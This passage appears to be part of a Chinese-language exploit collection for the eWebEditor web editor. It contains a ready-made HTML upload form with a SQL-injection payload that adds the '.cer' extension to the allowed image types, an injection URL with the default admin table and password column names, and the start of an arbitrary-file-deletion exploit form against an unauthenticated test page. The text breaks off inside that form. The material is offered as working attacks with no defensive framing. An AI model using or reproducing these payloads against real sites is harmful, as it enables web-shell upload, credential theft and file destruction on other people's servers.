![](https://csdnimg.cn/release/download_crawler_static/86325482/bg5.jpg)
<form
action="http://127.0.0.1/e/upload.asp?action=save&type=IMAGE&style=lu
oye' union select
S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S
_FileExt,S_FlashExt,
[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S
_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from
ewebeditor_style where s_name='standard'and'a'='a" method=post
name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
eWebEditor 2.7.0 注入漏洞
http://www.xx.com/ewebeditor/ewebeditor.asp?id=article_content&style=
full_v200
默认表名:eWebEditor_System
默认列名:sys_UserName、sys_UserPass
eWebEditor2.8.0 最终版删除任意文件漏洞
此 漏 洞 存 在 于 Example\NewsSystem 目 录 下的 delete.asp 文 件 中 ,这 是
ewebeditor 的测试页面,无须登陆可以直接进入。
EXP:
<HTML><HEAD><TITLE>eWebEditor 删除文
件 by:oldjun([url]http://www.oldjun.com[/url])</TITLE>
<style>body,p,td,input {font-size:9pt}</style>
</HEAD><BODY><a href='list.asp'>新闻列表</a> | <a href='add.asp'>增加
新闻</a>
<b>增加新闻</b>
<form action="http://127.0.0.1/editor/Example/NewsSystem/addsave.asp"
method="post" name="myform">
<input type=hidden name=d_originalfilename>
<input type=hidden name=d_savefilename>